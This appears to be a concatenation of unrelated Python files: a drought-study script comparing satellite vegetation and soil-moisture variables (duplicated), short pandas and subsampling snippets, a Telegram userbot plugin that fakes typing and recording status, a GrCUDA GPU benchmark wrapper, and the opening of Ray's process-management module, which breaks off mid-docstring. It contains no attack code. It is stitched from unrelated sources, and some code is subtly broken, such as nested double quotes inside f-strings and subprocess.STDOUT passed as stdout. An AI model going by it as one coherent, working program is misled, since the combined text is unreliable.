import sys, os from pyprojroot import here import logging import pathlib logging.basicConfig(stream=sys.stdout, level=logging.INFO) logger = logging.getLogger() PATH = pathlib.Path(str(here())) # root = here(project_files=[".here"]) sys.path.append(str(here())) import argparse import numpy as np # drought tools from src.data.drought.loader import DataLoader from src.features.drought.build_features import ( get_cali_geometry, mask_datacube, remove_climatology, get_density_cubes, get_common_elements_many, ) import pandas as pd from sklearn.preprocessing import StandardScaler from src.models.train_models import get_similarity_scores from src.models.similarity import univariate_stats from tqdm import tqdm from src.features.utils import subset_indices from scipy import stats from src.experiments.utils import dict_product import itertools RES_PATH = PATH.joinpath("data/drought/results/compare") def main(args): # get save name SAVE_NAME = RES_PATH.joinpath( args.save + f"_t{args.temporal}_s{args.spatial}_c{args.compare}_smadi.csv" ) SMOKE_NAME = RES_PATH.joinpath( args.save + f"_t{args.temporal}_s{args.spatial}_c{args.compare}_smadi_sm.csv" ) # Load data logger.info("Loading datacube...") drought_cube = DataLoader().load_data(args.region, args.sampling) # get cali geometry logger.info("Getting shapefile...") if args.region in ["conus"]: shape_file = get_cali_geometry() else: raise ValueError("Unrecognized region.") # subset datacube with cali logger.info(f"Masking dataset with {args.region} shapefile.") drought_cube = mask_datacube(drought_cube, shape_file) # do interpolation logger.info(f"Interpolating time dims with {args.interp_method} method") drought_cube = drought_cube.interpolate_na(dim="time", method=args.interp_method) # Remove climatology logger.info(f"Removing climatology") drought_cube, _ = remove_climatology(drought_cube) # drought_years drought_years = { "2010": False, "2011": False, "2012": True, "2013": False, "2014": True, "2015": True, } # # MI elements # variables_names = ["VOD", "NDVI", "LST", "SM"] # ======================== # Experimental Parameters # ======================== parameters = {} parameters["cubes"] = list(drought_cube.groupby("time.year")) parameters["temporal"] = np.arange(1, args.temporal + 1) parameters["spatial"] = np.arange(1, args.spatial + 1) parameters = list(dict_product(parameters)) results_df_single = pd.DataFrame() if args.smoke_test: iparams = parameters[0] # extract density cubes vod_df, lst_df, ndvi_df, sm_df = get_density_cubes( iparams["cubes"][1], iparams["spatial"], iparams["temporal"] ) # get common elements dfs = get_common_elements_many([vod_df, lst_df, ndvi_df, sm_df]) variables = {"VOD": dfs[0], "NDVI": dfs[1], "SM": dfs[2], "LST": dfs[3]} # get unique permutations res = set( tuple( frozenset(sub) for sub in set( list(itertools.permutations(variables.keys(), args.compare)) ) ) ) var_set1 = pd.concat( [variables["NDVI"], variables["SM"], variables["LST"]], axis=1 ) var_set2 = pd.concat( [variables["NDVI"], variables["SM"], variables["LST"], variables["VOD"],], axis=1, ) # print(var_set1.shape, var_set2.shape) # Univariate statistics (pearson, spearman, kendall's tau) # uni_stats = univariate_stats(X_norm, Y_norm) logger.info(f"Subsetting data") idx = subset_indices(var_set1, subsample=1_000) # standardize data logger.info(f"Standardizing Data...") X_norm = StandardScaler().fit_transform(var_set1.iloc[idx, :]) Y_norm = StandardScaler().fit_transform(var_set2.iloc[idx, :]) logger.info(f"Data inputs: {X_norm.shape},{Y_norm.shape}") # entropy, 
total correlation logger.info(f"Getting similarity scores...") multivar_stats = get_similarity_scores(X_norm, Y_norm, verbose=1) # get H and TC results_df_single = results_df_single.append( { "year": iparams["cubes"][0], "drought": drought_years[str(iparams["cubes"][0])], "samples": X_norm.shape[0], "temporal": iparams["temporal"], "variable1": "SMADI", "variable2": "SMADI+", **multivar_stats, }, ignore_index=True, ) results_df_single.to_csv(SMOKE_NAME) else: with tqdm(parameters) as params: for iparams in params: # Update progress bar postfix = dict( Year=f"{iparams["cubes"][0]}", Temporal=f"{iparams["temporal"]}", Spatial=f"{iparams["spatial"]}", ) params.set_postfix(postfix) # extract density cubes vod_df, lst_df, ndvi_df, sm_df = get_density_cubes( iparams["cubes"][1], iparams["spatial"], iparams["temporal"] ) # get common elements dfs = get_common_elements_many([vod_df, lst_df, ndvi_df, sm_df]) variables = {"VOD": dfs[0], "NDVI": dfs[1], "SM": dfs[2], "LST": dfs[3]} # get unique permutations var_set1 = pd.concat( [variables["NDVI"], variables["SM"], variables["LST"]], axis=1 ) var_set2 = pd.concat( [ variables["NDVI"], variables["SM"], variables["LST"], variables["VOD"], ], axis=1, ) # print(var_set1.shape, var_set2.shape) # logger.info(f"Subsetting data") if args.subsample < var_set1.values.shape[0]: idx = subset_indices(var_set1.values, subsample=args.subsample) var_set1 = var_set1.iloc[idx, :] var_set2 = var_set2.iloc[idx, :] # standardize data # logger.info(f"Standardizing Data...") X_norm = StandardScaler().fit_transform(var_set1.values) Y_norm = StandardScaler().fit_transform(var_set2.values) # logger.info(f"Data inputs: {X_norm.shape},{Y_norm.shape}") # entropy, total correlation # logger.info(f"Getting similarity scores...") multivar_stats = get_similarity_scores(X_norm, Y_norm, verbose=0) # get H and TC results_df_single = results_df_single.append( { "year": iparams["cubes"][0], "drought": drought_years[str(iparams["cubes"][0])], "samples": X_norm.shape[0], "temporal": iparams["temporal"], "variable1": "SMADI", "variable2": "SMADI+", **multivar_stats, }, ignore_index=True, ) results_df_single.to_csv(SAVE_NAME) if __name__ == "__main__": parser = argparse.ArgumentParser(description="Arguments for Drought Experiment.") # DataCube Arguments parser.add_argument( "--region", default="conus", type=str, help="The region for the drought events." ) parser.add_argument( "--sampling", default="14D", type=str, help="The sampling scheme for drought events.", ) # PreProcessing Arguments parser.add_argument( "--interp_method", default="linear", type=str, help="Interpolation method." ) # Climatology Arguments parser.add_argument( "--climatology_window", default=2, type=int, help="Window length for climatology.", ) parser.add_argument( "--subsample", type=int, default=10_000, help="subset points to take" ) parser.add_argument( "-c", "--compare", type=int, default=2, help="variables to compare" ) parser.add_argument( "-t", "--temporal", type=int, default=12, help="Max number of temporal dimensions", ) parser.add_argument( "-s", "--spatial", type=int, default=1, help="Max number of spatial dimensions" ) # logistics parser.add_argument( "--save", default="drought_v0", type=str, help="Save Name for data results.", ) parser.add_argument("-sm", "--smoke_test", action="store_true") main(parser.parse_args())
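# Both the smoke-test and the full run above subsample the stacked variable sets and
# standardise them before computing similarity scores. A compact standalone version of
# that step using plain numpy and scikit-learn (subset_indices and get_similarity_scores
# are project helpers, so synthetic data and a random row choice stand in for them here):
import numpy as np
from sklearn.preprocessing import StandardScaler

rng = np.random.default_rng(0)
var_set1 = rng.normal(size=(5000, 3))   # e.g. NDVI, SM, LST density cubes
var_set2 = rng.normal(size=(5000, 4))   # the same plus VOD

idx = rng.choice(len(var_set1), size=1_000, replace=False)   # subsample rows
X_norm = StandardScaler().fit_transform(var_set1[idx])
Y_norm = StandardScaler().fit_transform(var_set2[idx])
print(X_norm.shape, Y_norm.shape)       # (1000, 3) (1000, 4)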
import sys, os from pyprojroot import here import logging import pathlib logging.basicConfig(stream=sys.stdout, level=logging.INFO) logger = logging.getLogger() PATH = pathlib.Path(str(here())) # root = here(project_files=[".here"]) sys.path.append(str(here())) import argparse import numpy as np # drought tools from src.data.drought.loader import DataLoader from src.features.drought.build_features import ( get_cali_geometry, mask_datacube, remove_climatology, get_density_cubes, get_common_elements_many, ) import pandas as pd from sklearn.preprocessing import StandardScaler from src.models.train_models import get_similarity_scores from src.models.similarity import univariate_stats from tqdm import tqdm from src.features.utils import subset_indices from scipy import stats from src.experiments.utils import dict_product import itertools RES_PATH = PATH.joinpath("data/drought/results/compare") def main(args): # get save name SAVE_NAME = RES_PATH.joinpath( args.save + f"_t{args.temporal}_s{args.spatial}_c{args.compare}_smadi.csv" ) SMOKE_NAME = RES_PATH.joinpath( args.save + f"_t{args.temporal}_s{args.spatial}_c{args.compare}_smadi_sm.csv" ) # Load data logger.info("Loading datacube...") drought_cube = DataLoader().load_data(args.region, args.sampling) # get cali geometry logger.info("Getting shapefile...") if args.region in ["conus"]: shape_file = get_cali_geometry() else: raise ValueError("Unrecognized region.") # subset datacube with cali logger.info(f"Masking dataset with {args.region} shapefile.") drought_cube = mask_datacube(drought_cube, shape_file) # do interpolation logger.info(f"Interpolating time dims with {args.interp_method} method") drought_cube = drought_cube.interpolate_na(dim="time", method=args.interp_method) # Remove climatology logger.info(f"Removing climatology") drought_cube, _ = remove_climatology(drought_cube) # drought_years drought_years = { "2010": False, "2011": False, "2012": True, "2013": False, "2014": True, "2015": True, } # # MI elements # variables_names = ["VOD", "NDVI", "LST", "SM"] # ======================== # Experimental Parameters # ======================== parameters = {} parameters["cubes"] = list(drought_cube.groupby("time.year")) parameters["temporal"] = np.arange(1, args.temporal + 1) parameters["spatial"] = np.arange(1, args.spatial + 1) parameters = list(dict_product(parameters)) results_df_single = pd.DataFrame() if args.smoke_test: iparams = parameters[0] # extract density cubes vod_df, lst_df, ndvi_df, sm_df = get_density_cubes( iparams["cubes"][1], iparams["spatial"], iparams["temporal"] ) # get common elements dfs = get_common_elements_many([vod_df, lst_df, ndvi_df, sm_df]) variables = {"VOD": dfs[0], "NDVI": dfs[1], "SM": dfs[2], "LST": dfs[3]} # get unique permutations res = set( tuple( frozenset(sub) for sub in set( list(itertools.permutations(variables.keys(), args.compare)) ) ) ) var_set1 = pd.concat( [variables["NDVI"], variables["SM"], variables["LST"]], axis=1 ) var_set2 = pd.concat( [variables["NDVI"], variables["SM"], variables["LST"], variables["VOD"],], axis=1, ) # print(var_set1.shape, var_set2.shape) # Univariate statistics (pearson, spearman, kendall's tau) # uni_stats = univariate_stats(X_norm, Y_norm) logger.info(f"Subsetting data") idx = subset_indices(var_set1, subsample=1_000) # standardize data logger.info(f"Standardizing Data...") X_norm = StandardScaler().fit_transform(var_set1.iloc[idx, :]) Y_norm = StandardScaler().fit_transform(var_set2.iloc[idx, :]) logger.info(f"Data inputs: {X_norm.shape},{Y_norm.shape}") # entropy, 
total correlation logger.info(f"Getting similarity scores...") multivar_stats = get_similarity_scores(X_norm, Y_norm, verbose=1) # get H and TC results_df_single = results_df_single.append( { "year": iparams["cubes"][0], "drought": drought_years[str(iparams["cubes"][0])], "samples": X_norm.shape[0], "temporal": iparams["temporal"], "variable1": "SMADI", "variable2": "SMADI+", **multivar_stats, }, ignore_index=True, ) results_df_single.to_csv(SMOKE_NAME) else: with tqdm(parameters) as params: for iparams in params: # Update progress bar postfix = dict( Year=f"{iparams['cubes'][0]}", Temporal=f"{iparams['temporal']}", Spatial=f"{iparams['spatial']}", ) params.set_postfix(postfix) # extract density cubes vod_df, lst_df, ndvi_df, sm_df = get_density_cubes( iparams["cubes"][1], iparams["spatial"], iparams["temporal"] ) # get common elements dfs = get_common_elements_many([vod_df, lst_df, ndvi_df, sm_df]) variables = {"VOD": dfs[0], "NDVI": dfs[1], "SM": dfs[2], "LST": dfs[3]} # get unique permutations var_set1 = pd.concat( [variables["NDVI"], variables["SM"], variables["LST"]], axis=1 ) var_set2 = pd.concat( [ variables["NDVI"], variables["SM"], variables["LST"], variables["VOD"], ], axis=1, ) # print(var_set1.shape, var_set2.shape) # logger.info(f"Subsetting data") if args.subsample < var_set1.values.shape[0]: idx = subset_indices(var_set1.values, subsample=args.subsample) var_set1 = var_set1.iloc[idx, :] var_set2 = var_set2.iloc[idx, :] # standardize data # logger.info(f"Standardizing Data...") X_norm = StandardScaler().fit_transform(var_set1.values) Y_norm = StandardScaler().fit_transform(var_set2.values) # logger.info(f"Data inputs: {X_norm.shape},{Y_norm.shape}") # entropy, total correlation # logger.info(f"Getting similarity scores...") multivar_stats = get_similarity_scores(X_norm, Y_norm, verbose=0) # get H and TC results_df_single = results_df_single.append( { "year": iparams["cubes"][0], "drought": drought_years[str(iparams["cubes"][0])], "samples": X_norm.shape[0], "temporal": iparams["temporal"], "variable1": "SMADI", "variable2": "SMADI+", **multivar_stats, }, ignore_index=True, ) results_df_single.to_csv(SAVE_NAME) if __name__ == "__main__": parser = argparse.ArgumentParser(description="Arguments for Drought Experiment.") # DataCube Arguments parser.add_argument( "--region", default="conus", type=str, help="The region for the drought events." ) parser.add_argument( "--sampling", default="14D", type=str, help="The sampling scheme for drought events.", ) # PreProcessing Arguments parser.add_argument( "--interp_method", default="linear", type=str, help="Interpolation method." ) # Climatology Arguments parser.add_argument( "--climatology_window", default=2, type=int, help="Window length for climatology.", ) parser.add_argument( "--subsample", type=int, default=10_000, help="subset points to take" ) parser.add_argument( "-c", "--compare", type=int, default=2, help="variables to compare" ) parser.add_argument( "-t", "--temporal", type=int, default=12, help="Max number of temporal dimensions", ) parser.add_argument( "-s", "--spatial", type=int, default=1, help="Max number of spatial dimensions" ) # logistics parser.add_argument( "--save", default="drought_v0", type=str, help="Save Name for data results.", ) parser.add_argument("-sm", "--smoke_test", action="store_true") main(parser.parse_args())
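# The result loops above accumulate rows with DataFrame.append, which was deprecated in
# pandas 1.4 and removed in pandas 2.0. Collecting plain dicts and building the frame
# once (or concatenating) is the usual replacement; the column names below mirror the
# experiment's output and the values are illustrative only.
import pandas as pd

rows = []
for year, drought, stats in [(2012, True, {"H": 1.2}), (2013, False, {"H": 0.9})]:
    rows.append({
        "year": year,
        "drought": drought,
        "variable1": "SMADI",
        "variable2": "SMADI+",
        **stats,
    })

results_df = pd.DataFrame(rows)   # one construction instead of repeated appends
# or, when rows arrive incrementally:
# results_df = pd.concat([results_df, pd.DataFrame([row])], ignore_index=True)
print(results_df)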
# Ultroid - UserBot # Copyright (C) 2020 TeamUltroid # # This file is a part of < https://github.com/TeamUltroid/Ultroid/ > # PLease read the GNU Affero General Public License in # <https://www.github.com/TeamUltroid/Ultroid/blob/main/LICENSE/>. """ ✘ Commands Available - • `{i}ftyping <time/in secs>` `Show Fake Typing in current chat. ` • `{i}faudio <time/in secs>` `Show Fake Recording Action in current chat. ` • `{i}fvideo <time/in secs>` `Show Fake video action in current chat. ` • `{i}fgame <time/in secs>` `Show Fake Game Playing Action in current chat. ` """ from . import * @ultroid_cmd(pattern="ftyping ?(.*)") async def _(e): t = e.pattern_match.group(1) if not (t or t.isdigit()): t = 100 else: try: t = int(t) except BaseException: try: t = await ban_time(e, t) except BaseException: return await eod(e, "`Incorrect Format`") await eod(e, f"Starting Fake Typing For {t} sec.") async with e.client.action(e.chat_id, "typing"): await asyncio.sleep(t) @ultroid_cmd(pattern="faudio ?(.*)") async def _(e): t = e.pattern_match.group(1) if not (t or t.isdigit()): t = 100 else: try: t = int(t) except BaseException: try: t = await ban_time(e, t) except BaseException: return await eod(e, "`Incorrect Format`") await eod(e, f"Starting Fake audio recording For {t} sec.") async with e.client.action(e.chat_id, "record-audio"): await asyncio.sleep(t) @ultroid_cmd(pattern="fvideo ?(.*)") async def _(e): t = e.pattern_match.group(1) if not (t or t.isdigit()): t = 100 else: try: t = int(t) except BaseException: try: t = await ban_time(e, t) except BaseException: return await eod(e, "`Incorrect Format`") await eod(e, f"Starting Fake video recording For {t} sec.") async with e.client.action(e.chat_id, "record-video"): await asyncio.sleep(t) @ultroid_cmd(pattern="fgame ?(.*)") async def _(e): t = e.pattern_match.group(1) if not (t or t.isdigit()): t = 100 else: try: t = int(t) except BaseException: try: t = await ban_time(e, t) except BaseException: return await eod(e, "`Incorrect Format`") await eod(e, f"Starting Fake Game Playing For {t} sec.") async with e.client.action(e.chat_id, "game"): await asyncio.sleep(t) HELP.update({f"{__name__.split('.')[1]}": f"{__doc__.format(i=HNDLR)}"})
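# ---------------------------------------------------------------------------
# Editor's illustrative sketch (not part of the original plugin). The commands
# above fall back to `ban_time(e, t)` to parse human-readable durations; its
# exact behaviour lives elsewhere in the Ultroid codebase. A hypothetical
# parser for inputs such as "30s", "5m" or "2h" might look like this:
def _parse_duration_sketch(value: str) -> int:
    """Return the number of seconds encoded by e.g. '30s', '5m', '2h', '1d'."""
    units = {"s": 1, "m": 60, "h": 3600, "d": 86400}
    value = value.strip().lower()
    if value.isdigit():
        return int(value)
    return int(value[:-1]) * units[value[-1]]


# Example: _parse_duration_sketch("5m") -> 300
# ---------------------------------------------------------------------------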
import argparse import subprocess import time import os from datetime import datetime from benchmark_result import BenchmarkResult from benchmark_main import create_block_size_list from java.lang import System ############################## ############################## DEFAULT_NUM_BLOCKS = 32 # GTX 960, 8 SM DEFAULT_NUM_BLOCKS = 448 # P100, 56 SM DEFAULT_NUM_BLOCKS = 176 # GTX 1660 Super, 22 SM HEAP_SIZE = 26 #HEAP_SIZE = 140 # P100 # Benchmark settings; benchmarks = [ "b1", "b5", "b6", "b7", "b8", "b10", ] # GTX 960 num_elem = { "b1": [1000],#[20_000_000, 60_000_000, 80_000_000, 100_000_000, 120_000_000], "b5": [2000],#[2_000_000, 6_000_000, 8_000_000, 10_000_000, 12_000_000], "b6": [200],#[200_000, 500_000, 800_000, 1_000_000, 1_200_000], "b7": [4000],#[4_000_000, 7_000_000, 10_000_000, 15_000_000, 20_000_000], "b8": [800],#[1600, 2400, 3200, 4000, 4800], "b10": [300],#[3000, 4000, 5000, 6000, 7000], } # P100 #num_elem = { # "b1": [120_000_000, 200_000_000, 500_000_000, 600_000_000, 700_000_000], # "b5": [12_000_000, 20_000_000, 50_000_000, 60_000_000, 70_000_000], # "b6": [1_200_000, 2_000_000, 4_000_000, 5_000_000, 6_000_000], # "b7": [20_000_000, 40_000_000, 60_000_000, 100_000_000, 140_000_000], # "b8": [4800, 8000, 10000, 12000, 16000], # "b10": [7000, 10000, 12000, 14000, 16000], #} # GTX 1660 Super #num_elem = { # "b1": [60_000_000, 80_000_000, 100_000_000, 120_000_000, 200_000_000], # "b5": [6_000_000, 8_000_000, 10_000_000, 12_000_000, 20_000_000], # "b6": [500_000, 800_000, 1_000_000, 1_200_000, 2_000_000], # "b7": [7_000_000, 10_000_000, 15_000_000, 20_000_000, 40_000_000], # "b8": [3200, 4000, 4800, 8000, 10000], # "b10": [6000, 7000, 10000, 12000, 14000], #} exec_policies = ["default"]#, "sync"] cuda_exec_policies = ["default", "sync", "cudagraph", "cudagraphmanual", "cudagraphsingle"] new_stream_policies = ["always-new"] parent_stream_policies = ["disjoint"] dependency_policies = ["with-const"] prefetch = [True, False] block_sizes_1d = [32]#[32, 128, 256, 1024] block_sizes_2d = [8]#[8, 8, 8, 8] # 960 # block_dim_dict = { # "b1": DEFAULT_NUM_BLOCKS, # "b5": DEFAULT_NUM_BLOCKS, # "b6": 32, # "b7": DEFAULT_NUM_BLOCKS, # "b8": 12, # "b10": 16, # } # P100 # block_dim_dict = { # "b1": DEFAULT_NUM_BLOCKS, # "b5": DEFAULT_NUM_BLOCKS, # "b6": 64, # "b7": DEFAULT_NUM_BLOCKS, # "b8": 32, # "b10": DEFAULT_NUM_BLOCKS, # } # 1660 block_dim_dict = { "b1": DEFAULT_NUM_BLOCKS, "b5": DEFAULT_NUM_BLOCKS, "b6": 32, "b7": DEFAULT_NUM_BLOCKS, "b8": 16, "b10": DEFAULT_NUM_BLOCKS, } ############################## ############################## CUDA_CMD = "./b -k {} -p {} -n {} -b {} -c {} -t {} -g {} {} {} | tee {}" def execute_cuda_benchmark(benchmark, size, block_size, exec_policy, num_iter, debug, prefetch=False, num_blocks=DEFAULT_NUM_BLOCKS, output_date=None): if debug: BenchmarkResult.log_message("") BenchmarkResult.log_message("") BenchmarkResult.log_message("#" * 30) BenchmarkResult.log_message(f"Benchmark {i + 1}/{tot_benchmarks}") BenchmarkResult.log_message(f"benchmark={b}, size={n}," f" block size={block_size}, " f" prefetch={prefetch}, " f" num blocks={num_blocks}, " f" exec policy={exec_policy}") BenchmarkResult.log_message("#" * 30) BenchmarkResult.log_message("") BenchmarkResult.log_message("") if not output_date: output_date = datetime.now().strftime("%Y_%m_%d_%H_%M_%S") file_name = f"cuda_{output_date}_{benchmark}_{exec_policy}_{size}_{block_size['block_size_1d']}_{block_size['block_size_2d']}_{prefetch}_{num_iter}_{num_blocks}.csv" # Create a folder if it doesn't exist; 
output_folder_path = os.path.join(BenchmarkResult.DEFAULT_RES_FOLDER, output_date + "_cuda") if not os.path.exists(output_folder_path): if debug: BenchmarkResult.log_message(f"creating result folder: {output_folder_path}") os.mkdir(output_folder_path) output_path = os.path.join(output_folder_path, file_name) benchmark_cmd = CUDA_CMD.format(benchmark, exec_policy, size, block_size["block_size_1d"], block_size["block_size_2d"], num_iter, num_blocks, "-r" if prefetch else "", "-a", output_path) start = System.nanoTime() result = subprocess.run(benchmark_cmd, shell=True, stdout=subprocess.STDOUT, cwd=f"{os.getenv('GRCUDA_HOME')}/projects/resources/cuda/bin") result.check_returncode() end = System.nanoTime() if debug: BenchmarkResult.log_message(f"Benchmark total execution time: {(end - start) / 1_000_000_000:.2f} seconds") ############################## ############################## GRAALPYTHON_CMD = "graalpython --vm.XX:MaxHeapSize={}G --jvm --polyglot " \ "--grcuda.RetrieveNewStreamPolicy={} {} --grcuda.ForceStreamAttach --grcuda.ExecutionPolicy={} --grcuda.DependencyPolicy={} " \ "--grcuda.RetrieveParentStreamPolicy={} benchmark_main.py -i {} -n {} -g {} " \ "--reinit false --realloc false -b {} --block_size_1d {} --block_size_2d {} --no_cpu_validation {} {} -o {}" def execute_grcuda_benchmark(benchmark, size, block_sizes, exec_policy, new_stream_policy, parent_stream_policy, dependency_policy, num_iter, debug, time_phases, num_blocks=DEFAULT_NUM_BLOCKS, prefetch=False, output_date=None): if debug: BenchmarkResult.log_message("") BenchmarkResult.log_message("") BenchmarkResult.log_message("#" * 30) BenchmarkResult.log_message(f"Benchmark {i + 1}/{tot_benchmarks}") BenchmarkResult.log_message(f"benchmark={benchmark}, size={n}," f"block sizes={block_sizes}, " f"num blocks={num_blocks}, " f"exec policy={exec_policy}, " f"new stream policy={new_stream_policy}, " f"parent stream policy={parent_stream_policy}, " f"dependency policy={dependency_policy}, " f"prefetch={prefetch}, " f"time_phases={time_phases}") BenchmarkResult.log_message("#" * 30) BenchmarkResult.log_message("") BenchmarkResult.log_message("") if not output_date: output_date = datetime.now().strftime("%Y_%m_%d_%H_%M_%S") file_name = f"{output_date}_{benchmark}_{exec_policy}_{new_stream_policy}_{parent_stream_policy}_" \ f"{dependency_policy}_{prefetch}_{size}_{num_iter}_{num_blocks}.json" # Create a folder if it doesn't exist; output_folder_path = os.path.join(BenchmarkResult.DEFAULT_RES_FOLDER, output_date + "_grcuda") if not os.path.exists(output_folder_path): if debug: BenchmarkResult.log_message(f"creating result folder: {output_folder_path}") os.mkdir(output_folder_path) output_path = os.path.join(output_folder_path, file_name) b1d_size = " ".join([str(b['block_size_1d']) for b in block_sizes]) b2d_size = " ".join([str(b['block_size_2d']) for b in block_sizes]) benchmark_cmd = GRAALPYTHON_CMD.format(HEAP_SIZE, new_stream_policy, "--grcuda.InputPrefetch" if prefetch else "", exec_policy, dependency_policy, parent_stream_policy, num_iter, size, num_blocks, benchmark, b1d_size, b2d_size, "-d" if debug else "", "-p" if time_phases else "", output_path) start = System.nanoTime() result = subprocess.run(benchmark_cmd, shell=True, stdout=subprocess.STDOUT, cwd=f"{os.getenv('GRCUDA_HOME')}/projects/resources/python/benchmark") result.check_returncode() end = System.nanoTime() if debug: BenchmarkResult.log_message(f"Benchmark total execution time: {(end - start) / 1_000_000_000:.2f} seconds") ############################## 
############################## if __name__ == "__main__": parser = argparse.ArgumentParser(description="Wrap the GrCUDA benchmark to specify additional settings") parser.add_argument("-d", "--debug", action="store_true", help="If present, print debug messages") parser.add_argument("-c", "--cuda_test", action="store_true", help="If present, run performance tests using CUDA") parser.add_argument("-i", "--num_iter", metavar="N", type=int, default=BenchmarkResult.DEFAULT_NUM_ITER, help="Number of times each benchmark is executed") parser.add_argument("-g", "--num_blocks", metavar="N", type=int, help="Number of blocks in each kernel, when applicable") parser.add_argument("-p", "--time_phases", action="store_true", help="Measure the execution time of each phase of the benchmark;" " note that this introduces overheads, and might influence the total execution time") # Parse the input arguments; args = parser.parse_args() debug = args.debug if args.debug else BenchmarkResult.DEFAULT_DEBUG num_iter = args.num_iter if args.num_iter else BenchmarkResult.DEFAULT_NUM_ITER use_cuda = args.cuda_test time_phases = args.time_phases num_blocks = args.num_blocks # Setup the block size for each benchmark; block_sizes = create_block_size_list(block_sizes_1d, block_sizes_2d) if debug: BenchmarkResult.log_message(f"using block sizes: {block_sizes}; using low-level CUDA benchmarks: {use_cuda}") def tot_benchmark_count(): tot = 0 if use_cuda: for b in benchmarks: tot += len(num_elem[b]) * len(block_sizes) * len(cuda_exec_policies) * len(new_stream_policies) * len(parent_stream_policies) * len(dependency_policies) * len(prefetch) else: for b in benchmarks: tot += len(num_elem[b]) * len(exec_policies) * len(prefetch) return tot output_date = datetime.now().strftime("%Y_%m_%d_%H_%M_%S") # Execute each test; i = 0 tot_benchmarks = tot_benchmark_count() for b in benchmarks: for n in num_elem[b]: if use_cuda: # CUDA Benchmarks; for exec_policy in cuda_exec_policies: for block_size in block_sizes: for p in prefetch: nb = num_blocks if num_blocks else block_dim_dict[b] execute_cuda_benchmark(b, n, block_size, exec_policy, num_iter, debug, num_blocks=nb, prefetch=p, output_date=output_date) i += 1 # GrCUDA Benchmarks; else: for exec_policy in exec_policies: for new_stream_policy in new_stream_policies: for parent_stream_policy in parent_stream_policies: for dependency_policy in dependency_policies: for p in prefetch: nb = num_blocks if num_blocks else block_dim_dict[b] execute_grcuda_benchmark(b, n, block_sizes, exec_policy, new_stream_policy, parent_stream_policy, dependency_policy, num_iter, debug, time_phases, prefetch=p, num_blocks=nb, output_date=output_date) i += 1
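# ---------------------------------------------------------------------------
# Editor's usage note (assumption, not part of the original wrapper). Because
# this script imports java.lang.System, it is expected to run on GraalVM's
# graalpython with JVM interop enabled, e.g. (script name assumed):
#   graalpython --jvm --polyglot benchmark_wrapper.py -d -i 30 -g 176
# For reference, a command rendered from GRAALPYTHON_CMD by
# execute_grcuda_benchmark would look roughly like:
#   graalpython --vm.XX:MaxHeapSize=26G --jvm --polyglot \
#     --grcuda.RetrieveNewStreamPolicy=always-new --grcuda.InputPrefetch \
#     --grcuda.ForceStreamAttach --grcuda.ExecutionPolicy=default \
#     --grcuda.DependencyPolicy=with-const \
#     --grcuda.RetrieveParentStreamPolicy=disjoint benchmark_main.py \
#     -i 30 -n 1000 -g 176 --reinit false --realloc false -b b1 \
#     --block_size_1d 32 --block_size_2d 8 --no_cpu_validation -o <output.json>
# ---------------------------------------------------------------------------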
import base64 import collections import errno import io import json import logging import multiprocessing import os from pathlib import Path import mmap import random import shutil import signal import socket import subprocess import sys import time from typing import Optional # Ray modules import ray import ray.ray_constants as ray_constants import redis # Import psutil and colorama after ray so the packaged version is used. import colorama import psutil resource = None if sys.platform != "win32": import resource EXE_SUFFIX = ".exe" if sys.platform == "win32" else "" # True if processes are run in the valgrind profiler. RUN_RAYLET_PROFILER = False # Location of the redis server and module. RAY_HOME = os.path.join(os.path.dirname(os.path.dirname(__file__)), "../..") RAY_PATH = os.path.abspath(os.path.dirname(os.path.dirname(__file__))) RAY_PRIVATE_DIR = "_private" AUTOSCALER_PRIVATE_DIR = "autoscaler/_private" REDIS_EXECUTABLE = os.path.join( RAY_PATH, "core/src/ray/thirdparty/redis/src/redis-server" + EXE_SUFFIX) REDIS_MODULE = os.path.join( RAY_PATH, "core/src/ray/gcs/redis_module/libray_redis_module.so") # Location of the raylet executables. RAYLET_EXECUTABLE = os.path.join(RAY_PATH, "core/src/ray/raylet/raylet" + EXE_SUFFIX) GCS_SERVER_EXECUTABLE = os.path.join( RAY_PATH, "core/src/ray/gcs/gcs_server" + EXE_SUFFIX) # Location of the cpp default worker executables. DEFAULT_WORKER_EXECUTABLE = os.path.join( RAY_PATH, "core/src/ray/cpp/default_worker" + EXE_SUFFIX) # Logger for this module. It should be configured at the entry point # into the program using Ray. Ray provides a default configuration at # entry/init points. logger = logging.getLogger(__name__) ProcessInfo = collections.namedtuple("ProcessInfo", [ "process", "stdout_file", "stderr_file", "use_valgrind", "use_gdb", "use_valgrind_profiler", "use_perftools_profiler", "use_tmux", ]) def serialize_config(config): return base64.b64encode(json.dumps(config).encode("utf-8")).decode("utf-8") class ConsolePopen(subprocess.Popen): if sys.platform == "win32": def terminate(self): if isinstance(self.stdin, io.IOBase): self.stdin.close() if self._use_signals: self.send_signal(signal.CTRL_BREAK_EVENT) else: super(ConsolePopen, self).terminate() def __init__(self, *args, **kwargs): # CREATE_NEW_PROCESS_GROUP is used to send Ctrl+C on Windows: # https://docs.python.org/3/library/subprocess.html#subprocess.Popen.send_signal new_pgroup = subprocess.CREATE_NEW_PROCESS_GROUP flags_to_add = 0 if ray._private.utils.detect_fate_sharing_support(): # If we don't have kernel-mode fate-sharing, then don't do this # because our children need to be in out process group for # the process reaper to properly terminate them. flags_to_add = new_pgroup flags_key = "creationflags" if flags_to_add: kwargs[flags_key] = (kwargs.get(flags_key) or 0) | flags_to_add self._use_signals = (kwargs[flags_key] & new_pgroup) super(ConsolePopen, self).__init__(*args, **kwargs) def address(ip_address, port): return ip_address + ":" + str(port) def new_port(lower_bound=10000, upper_bound=65535, denylist=None): if not denylist: denylist = set() port = random.randint(lower_bound, upper_bound) retry = 0 while port in denylist: if retry > 100: break port = random.randint(lower_bound, upper_bound) retry += 1 if retry > 100: raise ValueError("Failed to find a new port from the range " f"{lower_bound}-{upper_bound}. Denylist: {denylist}") return port def find_redis_address(address=None): """ Attempts to find all valid Ray redis addresses on this node. 
